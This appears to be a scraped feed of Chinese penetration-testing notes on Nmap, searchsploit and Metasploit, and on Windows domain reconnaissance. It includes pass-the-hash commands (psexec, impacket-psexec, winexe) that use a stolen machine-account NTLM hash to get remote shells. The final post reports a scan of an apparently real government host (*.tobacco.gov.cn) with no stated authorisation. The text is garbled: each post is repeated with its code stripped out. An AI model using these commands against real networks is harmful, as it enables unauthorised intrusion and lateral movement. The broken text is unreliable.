BroadcastChannel
https://channel.gandli.eu.org/
https://channel.gandli.eu.org/
###
---
#### 使用步骤
1. 使用 Nmap 扫描目标
使用 Nmap 的
示例:
2. 使用 `searchsploit` 分析 Nmap 扫描结果
通过
示例输出:
3. 进一步验证漏洞
确认漏洞的适用性,分析是否符合目标系统的实际配置。
---
#### 示例场景
假设我们扫描一个目标主机:
扫描结果存储在 `scan.xml`,然后运行:
#### 结合
如果需要更详细的输出,可以加上
---
#### 注意事项
1. 服务版本准确性
Nmap 的版本检测可能会不准确,建议手动确认目标服务版本。
2. 结果筛选
3. 不依赖漏洞数据库的完整性
---
#### 整体流程
1. 使用 Nmap 检测服务和版本信息。
2. 将扫描结果保存为 XML 文件。
3. 使用
---
#### 关键词
#searchsploit #Nmap #漏洞扫描 #渗透测试 #Exploit-DB
searchsploit 与 Nmap 联合使用指南searchsploit 可以与 Nmap 工具结合,快速从 Nmap 的扫描结果中提取可能的漏洞利用信息。Nmap 扫描到的服务和版本信息会被传递给 `searchsploit`,从而定位相关漏洞。---
#### 使用步骤
1. 使用 Nmap 扫描目标
使用 Nmap 的
-sV 选项进行服务版本检测,并将结果保存为 XML 格式: nmap -sV -oX nmap_results.xml <target>
示例:
nmap -sV -oX nmap_results.xml 192.168.1.1
2. 使用 `searchsploit` 分析 Nmap 扫描结果
通过
--nmap 选项,将 Nmap 的 XML 文件输入到 `searchsploit`: searchsploit --nmap nmap_results.xml
示例输出:
Services matching "Apache 2.4.29":
- Apache HTTP Server 2.4.29 - Path Traversal
https://www.exploit-db.com/exploits/12345
3. 进一步验证漏洞
确认漏洞的适用性,分析是否符合目标系统的实际配置。
---
#### 示例场景
假设我们扫描一个目标主机:
nmap -sV -oX scan.xml 192.168.1.10扫描结果存储在 `scan.xml`,然后运行:
searchsploit --nmap scan.xml#### 结合
-v 查看更多详细信息如果需要更详细的输出,可以加上
-v 参数:searchsploit --nmap scan.xml -v---
#### 注意事项
1. 服务版本准确性
Nmap 的版本检测可能会不准确,建议手动确认目标服务版本。
2. 结果筛选
searchsploit 的输出可能包含一些与目标不相关的漏洞,需手动检查。3. 不依赖漏洞数据库的完整性
searchsploit 使用的是本地 Exploit-DB 数据库,可能不是最新的。建议定期更新: searchsploit -u
---
#### 整体流程
1. 使用 Nmap 检测服务和版本信息。
2. 将扫描结果保存为 XML 文件。
3. 使用
searchsploit --nmap 解析结果,提取可能的漏洞利用。---
#### 关键词
#searchsploit #Nmap #漏洞扫描 #渗透测试 #Exploit-DB
### 内网域信息探测与利用
在渗透测试中,域信息探测和利用计算机账户(如
### 1. 内网域信息探测
在对内网进行渗透时,首先需要了解目标网络的域信息,特别是关于域控制器、域名、计算机账户等。你可以通过以下方法获取内网域信息:
#### 1.1. 使用 Nmap 执行域扫描
Nmap 提供了一些脚本,可以帮助你快速探测目标网络中的域信息。以下是几种常见的 Nmap 脚本:
- 扫描域控制器**:
使用 `nmap` 的 `--script` 参数来扫描目标网络中的域控制器:
```bash
nmap -p 445 --script smb-os-fingerprint,smb-enum-domains,smb-enum-users <目标IP>
```
- `smb-enum-domains`:枚举网络中的域。
- `smb-enum-users`:枚举域中的用户账户。
- `smb-os-fingerprint`:识别目标系统的操作系统版本。
#### 1.2. **使用 SMB 扫描域信息
你可以使用 `smbclient` 工具来探测域和计算机信息。以下命令可以列出目标网络中的共享信息:
这个命令会列出目标主机的 SMB 共享,并显示域信息。如果你没有用户名,可以尝试匿名登录:
#### 1.3. 使用 Enum4Linux 获取域信息
该命令将显示大量的域信息,包括用户、组、计算机等。
#### 1.4. 查询域控制器的 DNS 信息
使用
这将显示与目标域相关的 LDAP 服务信息,帮助你定位域控制器。
### 2. 利用 `stu1$` 进行域渗透
#### 2.1. 理解 `stu1$` 计算机账户
计算机账户(以
#### 2.2. 使用 `stu1$` 进行横向渗透
一旦你获得了
- 使用 Psexec (Metasploit 的 psexec 模块)**:
```bash
use exploit/windows/smb/psexec
set RHOSTS <目标IP>
set SMBUser stu1$
set SMBPass <stu1$的NTLM哈希>
exploit
```
或者使用 `psexec.py` 工具:
```bash
python psexec.py stu1$:<stu1$的NTLM哈希>@<目标IP>
```
这将允许你使用 `stu1$` 账户(通过其 NTLM 哈希)执行远程命令。
#### 2.3. **利用 Pass-the-Hash 进行身份验证
通过
或者使用 `pth-winexe`:
这样,你就能在目标主机上执行命令,并获取访问权限。
#### 2.4. 进一步利用计算机账户
如果 `stu1$` 计算机账户属于域管理员组(例如 `Domain Admins`),你可以利用它来进行更深入的渗透操作,获取更高权限的访问。
- 通过 `net group` 命令列出域管理员组:
如果
### 3. 总结
- **域信息探测**:通过 Nmap、enum4linux、SMB 等工具,你可以收集内网的域信息、计算机账户、共享资源等。
- **利用
这些步骤将帮助你在内网中利用计算机账户进行有效的域渗透,进一步获得对目标网络的控制。
#域渗透 #PassTheHash #stu1$ #Metasploit #Nmap #SMB #横向渗透 #网络渗透
stu1$ 进行域渗透在渗透测试中,域信息探测和利用计算机账户(如
stu1$`)进行域渗透是常见的攻击步骤。下面,我会分别讲解如何进行域信息探测以及如何利用 `stu1$ 进行域渗透。### 1. 内网域信息探测
在对内网进行渗透时,首先需要了解目标网络的域信息,特别是关于域控制器、域名、计算机账户等。你可以通过以下方法获取内网域信息:
#### 1.1. 使用 Nmap 执行域扫描
Nmap 提供了一些脚本,可以帮助你快速探测目标网络中的域信息。以下是几种常见的 Nmap 脚本:
- 扫描域控制器**:
使用 `nmap` 的 `--script` 参数来扫描目标网络中的域控制器:
```bash
nmap -p 445 --script smb-os-fingerprint,smb-enum-domains,smb-enum-users <目标IP>
```
- `smb-enum-domains`:枚举网络中的域。
- `smb-enum-users`:枚举域中的用户账户。
- `smb-os-fingerprint`:识别目标系统的操作系统版本。
#### 1.2. **使用 SMB 扫描域信息
你可以使用 `smbclient` 工具来探测域和计算机信息。以下命令可以列出目标网络中的共享信息:
smbclient -L //<目标IP> -U <用户名>这个命令会列出目标主机的 SMB 共享,并显示域信息。如果你没有用户名,可以尝试匿名登录:
smbclient -L //<目标IP> -U guest#### 1.3. 使用 Enum4Linux 获取域信息
enum4linux 是一个强大的工具,用于从 Windows 主机(特别是域控制器)收集信息。你可以使用它来探测域名、域用户、计算机账户等信息:enum4linux -a <目标IP>该命令将显示大量的域信息,包括用户、组、计算机等。
#### 1.4. 查询域控制器的 DNS 信息
使用
nslookup 或 dig 查询域控制器的 DNS 记录:nslookup -type=SRV _ldap._tcp.<domain>这将显示与目标域相关的 LDAP 服务信息,帮助你定位域控制器。
### 2. 利用 `stu1$` 进行域渗透
stu1$ 是一个计算机账户,它通常在域中代表计算机或工作站(以 $ 结尾)。利用 stu1$ 进行域渗透通常涉及使用计算机账户的 NTLM 哈希进行身份验证,尤其是在通过 Windows 域网络进行横向移动时。#### 2.1. 理解 `stu1$` 计算机账户
计算机账户(以
$ 结尾)通常具有与域用户相同的权限,它们用于 Windows 域控制器上的身份验证。由于你已经获得了 stu1$ 计算机账户的 NTLM 哈希,你可以尝试使用它来在网络中进行身份验证或横向移动。#### 2.2. 使用 `stu1$` 进行横向渗透
一旦你获得了
stu1$ 计算机账户的 NTLM 哈希,你可以使用工具如 psexec`、`wmiexec 或 smbexec 来进行横向渗透。这些工具允许你利用 NTLM 哈希进行身份验证,并在远程主机上执行命令。- 使用 Psexec (Metasploit 的 psexec 模块)**:
```bash
use exploit/windows/smb/psexec
set RHOSTS <目标IP>
set SMBUser stu1$
set SMBPass <stu1$的NTLM哈希>
exploit
```
或者使用 `psexec.py` 工具:
```bash
python psexec.py stu1$:<stu1$的NTLM哈希>@<目标IP>
```
这将允许你使用 `stu1$` 账户(通过其 NTLM 哈希)执行远程命令。
#### 2.3. **利用 Pass-the-Hash 进行身份验证
通过
Pass-the-Hash 攻击,使用已获取的 NTLM 哈希直接进行身份验证,而无需明文密码。你可以利用 pth 工具包(如 `impacket`)进行攻击:impacket-psexec stu1$:<stu1$的NTLM哈希>@<目标IP>或者使用 `pth-winexe`:
winexe -U "stu1$%<stu1$的NTLM哈希>" //<目标IP> "cmd.exe"这样,你就能在目标主机上执行命令,并获取访问权限。
#### 2.4. 进一步利用计算机账户
如果 `stu1$` 计算机账户属于域管理员组(例如 `Domain Admins`),你可以利用它来进行更深入的渗透操作,获取更高权限的访问。
- 通过 `net group` 命令列出域管理员组:
net group "Domain Admins" /domain
如果
stu1$ 计算机账户属于该组,你可以尝试通过该账户获取域管理员权限。### 3. 总结
- **域信息探测**:通过 Nmap、enum4linux、SMB 等工具,你可以收集内网的域信息、计算机账户、共享资源等。
- **利用
stu1$ 进行域渗透**:通过 Pass-the-Hash 攻击、psexec 或 Winexe,你可以利用 stu1$ 计算机账户的 NTLM 哈希进行远程命令执行和横向渗透。这些步骤将帮助你在内网中利用计算机账户进行有效的域渗透,进一步获得对目标网络的控制。
#域渗透 #PassTheHash #stu1$ #Metasploit #Nmap #SMB #横向渗透 #网络渗透
### 使用 Nmap 进行目录扫描(基于字典)
Nmap 本身并不内置专门用于目录扫描的功能,但可以通过
### 使用
1. **指定字典文件**:
2. **命令格式**:
你可以使用以下命令进行目录扫描:
- `-p 80`:扫描目标主机的 80 端口。
-
- `--script-args http-enum.paths=/path/to/your/dictionary.txt`:指定字典文件路径。
- `192.168.5.233`:目标主机的 IP 地址。
### 配置字典文件
你可以使用一些常见的字典文件,比如 `dir-2000.txt`、`common.txt` 或者你自定义的字典文件。
#### 示例:
假设你有一个字典文件
### 扫描结果
Nmap 会根据字典中的目录列表,扫描每一个可能的目录并尝试访问,如果找到有效的目录,会在结果中显示出来。
### 注意事项
-
- 扫描时,如果目标站点的目录结构比较复杂,或者存在很多目录,这个扫描可能会比较慢。
### 示例输出
如果扫描成功,输出可能如下所示:
### 总结
使用
### 关键词
#Nmap #http-enum #目录扫描 #字典扫描 #漏洞扫描
Nmap 本身并不内置专门用于目录扫描的功能,但可以通过
http-enum 脚本与字典结合,进行目录扫描。### 使用
http-enum 脚本扫描目录1. **指定字典文件**:
http-enum 脚本支持通过 --script-args 参数传递字典文件来进行目录扫描。字典文件应该是一个包含潜在目录名称的文本文件(例如,`dir-2000.txt`)。2. **命令格式**:
你可以使用以下命令进行目录扫描:
nmap -p 80 --script http-enum --script-args http-enum.paths=/path/to/your/dictionary.txt 192.168.5.233
- `-p 80`:扫描目标主机的 80 端口。
-
--script http-enum`:使用 Nmap 的 `http-enum 脚本。- `--script-args http-enum.paths=/path/to/your/dictionary.txt`:指定字典文件路径。
- `192.168.5.233`:目标主机的 IP 地址。
### 配置字典文件
你可以使用一些常见的字典文件,比如 `dir-2000.txt`、`common.txt` 或者你自定义的字典文件。
#### 示例:
假设你有一个字典文件
dir-2000.txt`,并且你将其放置在 /home/kali/dir-2000.txt` 路径下,命令如下:nmap -p 80 --script http-enum --script-args http-enum.paths=/home/kali/dir-2000.txt 192.168.5.233### 扫描结果
Nmap 会根据字典中的目录列表,扫描每一个可能的目录并尝试访问,如果找到有效的目录,会在结果中显示出来。
### 注意事项
-
http-enum 脚本会尝试请求每个目录并根据 HTTP 响应码判断是否存在该目录。例如,响应 200 表示目录存在,而 404 表示目录不存在。- 扫描时,如果目标站点的目录结构比较复杂,或者存在很多目录,这个扫描可能会比较慢。
### 示例输出
如果扫描成功,输出可能如下所示:
Nmap scan report for 192.168.5.233
Host is up (0.0010s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /admin/: Found directory
| /images/: Found directory
| /uploads/: Found directory
| /login/: Found directory
|_ /assets/: Found directory
Nmap done: 1 IP address (1 host up) scanned in 8.92 seconds### 总结
使用
nmap 的 http-enum 脚本配合字典文件,可以高效地扫描目标网站的潜在目录。确保字典文件路径正确,且脚本已根据需求进行配置。### 关键词
#Nmap #http-enum #目录扫描 #字典扫描 #漏洞扫描
### Nmap 导出 XML,然后在 Metasploit 中导入
Nmap 可以将扫描结果导出为 XML 格式,Metasploit 可以通过
### 步骤 1:用 Nmap 执行扫描并导出 XML
首先,使用 Nmap 执行扫描并将结果保存为 XML 文件。您可以使用以下命令执行 Nmap 扫描:
-
-
### 步骤 2:将 Nmap XML 文件导入 Metasploit
完成扫描后,使用 Metasploit 的
-
- Metasploit 会解析 Nmap 导出的 XML 文件,并将结果导入数据库,包括主机、服务、漏洞等信息。
### 步骤 3:验证导入的数据
导入完成后,您可以通过 Metasploit 的
### 示例
假设您已经在
1. 执行 Nmap 扫描并导出 XML:
2. 导入 XML 文件到 Metasploit:
3. 验证导入数据:
### 注意事项
- 确保 Nmap 执行时使用了合适的脚本来检测漏洞,否则扫描结果可能没有包含您需要的漏洞信息。
- 如果扫描结果太大或复杂,可能需要查看 Metasploit 的日志以确认导入是否成功。
- 确保在运行
### 关键词
#Nmap #Metasploit #db_import #XML #漏洞扫描 #导入扫描结果 #数据库
Nmap 可以将扫描结果导出为 XML 格式,Metasploit 可以通过
db_import 命令导入这些 Nmap 的扫描结果。这个过程可以帮助您将 Nmap 扫描得到的结果直接存储到 Metasploit 的数据库中,方便后续分析和利用。### 步骤 1:用 Nmap 执行扫描并导出 XML
首先,使用 Nmap 执行扫描并将结果保存为 XML 文件。您可以使用以下命令执行 Nmap 扫描:
nmap -p 80 --script vuln -T4 -oX nmap_results.xml 192.168.5.233-
-oX nmap_results.xml 选项指定将扫描结果导出为 XML 文件。-
--script vuln 用于运行漏洞扫描脚本。### 步骤 2:将 Nmap XML 文件导入 Metasploit
完成扫描后,使用 Metasploit 的
db_import 命令导入 Nmap 导出的 XML 文件。首先确保 Metasploit 已连接到数据库,然后执行以下命令:msf6 > db_import /path/to/nmap_results.xml-
/path/to/nmap_results.xml 替换为您的实际文件路径。- Metasploit 会解析 Nmap 导出的 XML 文件,并将结果导入数据库,包括主机、服务、漏洞等信息。
### 步骤 3:验证导入的数据
导入完成后,您可以通过 Metasploit 的
hosts`、`services 和 vulns 等命令来查看数据库中的信息:msf6 > hosts
msf6 > services
msf6 > vulns### 示例
假设您已经在
192.168.5.233 上运行了 Nmap 扫描并导出了 XML 文件,接下来将其导入 Metasploit 数据库:1. 执行 Nmap 扫描并导出 XML:
nmap -p 80 --script vuln -T4 -oX nmap_results.xml 192.168.5.233
2. 导入 XML 文件到 Metasploit:
msf6 > db_import /path/to/nmap_results.xml
3. 验证导入数据:
msf6 > hosts
msf6 > services
msf6 > vulns
### 注意事项
- 确保 Nmap 执行时使用了合适的脚本来检测漏洞,否则扫描结果可能没有包含您需要的漏洞信息。
- 如果扫描结果太大或复杂,可能需要查看 Metasploit 的日志以确认导入是否成功。
- 确保在运行
db_import 命令时 Metasploit 正在连接到数据库,您可以使用 db_status 检查数据库连接状态。### 关键词
#Nmap #Metasploit #db_import #XML #漏洞扫描 #导入扫描结果 #数据库
nmap 扫描结果表明目标主机 192.168.153.130 上的端口 22 和 80 是开放的,分别提供 SSH 和 HTTP 服务。以下是详细分析:- **端口 22 (SSH)**:开放且正在运行 SSH 服务。
- **端口 80 (HTTP)**:开放且正在运行 HTTP 服务,扫描结果显示几个与安全相关的信息:
- **PHPSESSID Cookie**:未设置
httponly 标志,可能使会话信息更易受到 XSS 攻击。- **内部 IP 泄露**:HTTP 服务泄露了内部 IP 地址 `127.0.1.1`,可能暴露内部网络结构。
- **潜在目录**:`/images/` 目录可能包含敏感或有趣的文件,并且目录列表已启用,可能带来信息泄露风险。
- **Web 应用漏洞**:没有发现 CSRF、存储型 XSS 或 DOM 型 XSS 漏洞。
- **MAC 地址**:目标主机使用 VMware 虚拟机环境。
总的来说,目标主机有一些潜在的安全隐患,如会话标志未正确设置、内部 IP 泄漏以及可能暴露的目录列表。
#nmap #漏洞扫描 #SSH #HTTP #安全漏洞
nmap 收集信息:
### 1. 快速全端口扫描
- 功能**:扫描目标 IP 地址(192.168.153.130)上的所有端口(1-65535)。
- **选项**:
- `--min-rate 10000`:设置最小扫描速率,每秒发送最少 10000 个数据包,加快扫描速度。
- `-p-`:扫描所有端口。
- **用途**:适用于需要快速发现目标主机上开放端口的场景。
### 2. **TCP 全连接扫描 + 服务版本识别 + 操作系统识别 + 默认脚本扫描
- 功能**:对目标 IP 地址执行 TCP 连接扫描(全连接),并同时执行服务版本识别、操作系统识别和默认的漏洞扫描脚本。
- **选项**:
- `-sT`:TCP 连接扫描(通过完整的三次握手连接目标主机端口)。
- `-sV`:服务版本识别,查找目标主机上运行的服务版本。
- `-sC`:执行 nmap 默认脚本(例如检测已知漏洞、配置问题等)。
- `-O`:操作系统识别。
- `-p 22,80`:仅扫描端口 22 和 80。
- **用途**:适用于详细的信息收集和漏洞识别,尤其是对常见的服务(如 SSH、HTTP)进行深度分析。
### 3. **UDP 扫描
- 功能**:对目标 IP 地址执行 UDP 扫描,扫描端口 22 和 80。
- **选项**:
- `-sU`:执行 UDP 扫描(与 TCP 扫描不同,UDP 扫描不会建立连接,通常较慢)。
- `-p 22,80`:扫描端口 22 和 80(通常这两个端口是 TCP 服务,但此命令是通过 UDP 扫描的)。
- **用途**:用于检测目标主机上的 UDP 服务,特别是在 UDP 协议上常用的服务。
### 4. **漏洞扫描
- **功能**:对目标 IP 地址执行漏洞扫描,检查端口 22 和 80 是否存在已知的漏洞。
- **选项**:
- `--script=vuln`:启用 nmap 的漏洞扫描脚本(检查已知漏洞)。
- `-p 22,80`:扫描端口 22 和 80。
- **用途**:用于检测目标主机是否存在已知的安全漏洞,尤其适用于评估目标主机的安全性。
### 总结:
- **快速扫描**(第一个命令)适用于快速检测目标主机上开放的端口。
- **详细扫描**(第二个命令)用于获得目标的服务版本、操作系统信息和潜在漏洞。
- **UDP 扫描**(第三个命令)专门用于检测 UDP 协议上的服务,适用于识别不常见的 UDP 服务。
- **漏洞扫描**(第四个命令)通过漏洞脚本检查目标的已知漏洞,帮助识别潜在的安全风险。
这些命令可以帮助网络安全人员全面了解目标主机的开放端口、服务版本、操作系统信息,以及可能存在的安全漏洞。
#nmap #网络扫描 #漏洞扫描 #服务识别 #端口扫描
### 1. 快速全端口扫描
sudo nmap --min-rate 10000 -p- 192.168.153.130
- 功能**:扫描目标 IP 地址(192.168.153.130)上的所有端口(1-65535)。
- **选项**:
- `--min-rate 10000`:设置最小扫描速率,每秒发送最少 10000 个数据包,加快扫描速度。
- `-p-`:扫描所有端口。
- **用途**:适用于需要快速发现目标主机上开放端口的场景。
### 2. **TCP 全连接扫描 + 服务版本识别 + 操作系统识别 + 默认脚本扫描
sudo nmap -sT -sV -sC -O -p 22,80 192.168.153.130
- 功能**:对目标 IP 地址执行 TCP 连接扫描(全连接),并同时执行服务版本识别、操作系统识别和默认的漏洞扫描脚本。
- **选项**:
- `-sT`:TCP 连接扫描(通过完整的三次握手连接目标主机端口)。
- `-sV`:服务版本识别,查找目标主机上运行的服务版本。
- `-sC`:执行 nmap 默认脚本(例如检测已知漏洞、配置问题等)。
- `-O`:操作系统识别。
- `-p 22,80`:仅扫描端口 22 和 80。
- **用途**:适用于详细的信息收集和漏洞识别,尤其是对常见的服务(如 SSH、HTTP)进行深度分析。
### 3. **UDP 扫描
sudo nmap -sU -p 22,80 192.168.153.130
- 功能**:对目标 IP 地址执行 UDP 扫描,扫描端口 22 和 80。
- **选项**:
- `-sU`:执行 UDP 扫描(与 TCP 扫描不同,UDP 扫描不会建立连接,通常较慢)。
- `-p 22,80`:扫描端口 22 和 80(通常这两个端口是 TCP 服务,但此命令是通过 UDP 扫描的)。
- **用途**:用于检测目标主机上的 UDP 服务,特别是在 UDP 协议上常用的服务。
### 4. **漏洞扫描
sudo nmap --script=vuln -p 22,80 192.168.153.130
- **功能**:对目标 IP 地址执行漏洞扫描,检查端口 22 和 80 是否存在已知的漏洞。
- **选项**:
- `--script=vuln`:启用 nmap 的漏洞扫描脚本(检查已知漏洞)。
- `-p 22,80`:扫描端口 22 和 80。
- **用途**:用于检测目标主机是否存在已知的安全漏洞,尤其适用于评估目标主机的安全性。
### 总结:
- **快速扫描**(第一个命令)适用于快速检测目标主机上开放的端口。
- **详细扫描**(第二个命令)用于获得目标的服务版本、操作系统信息和潜在漏洞。
- **UDP 扫描**(第三个命令)专门用于检测 UDP 协议上的服务,适用于识别不常见的 UDP 服务。
- **漏洞扫描**(第四个命令)通过漏洞脚本检查目标的已知漏洞,帮助识别潜在的安全风险。
这些命令可以帮助网络安全人员全面了解目标主机的开放端口、服务版本、操作系统信息,以及可能存在的安全漏洞。
#nmap #网络扫描 #漏洞扫描 #服务识别 #端口扫描
使用
1. 第一个命令:
这个命令对目标 IP 地址(192.168.153.130)执行端口扫描,使用
2. 第二个命令:
这个命令执行多种扫描:
- `-sT`:使用 TCP 连接扫描(全连接扫描)。
- `-sV`:尝试识别服务版本。
- `-sC`:使用默认的脚本扫描(可以帮助发现更多信息)。
- `-O`:启用操作系统识别。
- `-p 22,80`:仅扫描端口 22 和 80。
3. 第三个命令:
这个命令执行 UDP 扫描(使用 `-sU`),对目标 IP 地址的 22 和 80 端口进行扫描。UDP 扫描通常比 TCP 扫描慢,因为 UDP 是无连接协议,且不返回 ACK 包。
这些命令适用于快速和全面的网络扫描,帮助识别目标系统上开放的端口、服务版本以及其他潜在的安全信息。
#nmap #网络扫描 #TCP扫描 #UDP扫描
nmap 执行不同扫描:1. 第一个命令:
sudo nmap --min-rate 10000 -p- 192.168.153.130 这个命令对目标 IP 地址(192.168.153.130)执行端口扫描,使用
--min-rate 10000 设置扫描速度,意味着每秒最小发送 10,000 个数据包,`-p-` 表示扫描所有端口(1-65535)。2. 第二个命令:
sudo nmap -sT -sV -sC -O -p 22,80 192.168.153.130 这个命令执行多种扫描:
- `-sT`:使用 TCP 连接扫描(全连接扫描)。
- `-sV`:尝试识别服务版本。
- `-sC`:使用默认的脚本扫描(可以帮助发现更多信息)。
- `-O`:启用操作系统识别。
- `-p 22,80`:仅扫描端口 22 和 80。
3. 第三个命令:
sudo nmap -sU -p 22,80 192.168.153.130 这个命令执行 UDP 扫描(使用 `-sU`),对目标 IP 地址的 22 和 80 端口进行扫描。UDP 扫描通常比 TCP 扫描慢,因为 UDP 是无连接协议,且不返回 ACK 包。
这些命令适用于快速和全面的网络扫描,帮助识别目标系统上开放的端口、服务版本以及其他潜在的安全信息。
#nmap #网络扫描 #TCP扫描 #UDP扫描
基本信息:
IP 地址:112.51.0.152
主机状态:在线(响应时间:0.0056s)
开放端口:
80/tcp(HTTP):
服务:Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
服务器:Microsoft-IIS/7.5
443/tcp(HTTPS):
服务:Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
服务器:Microsoft-IIS/7.5
SSL 证书信息:
通用名:*.tobacco.gov.cn
组织名:国家烟草专卖局
有效期:从 2024-08-01 到 2025-08-01
HTTP 方法:
存在潜在风险的方法:TRACE。
操作系统信息:
识别到的操作系统是基于 Linux 的 Actiontec MI424WR-GEN3I 无线接入点,内核版本为 2.4.X。
网络拓扑:
网络距离:2 跳。
额外信息:
脚本检测结果显示时钟偏差为 1 秒。
#Nmap #网络安全 #信息收集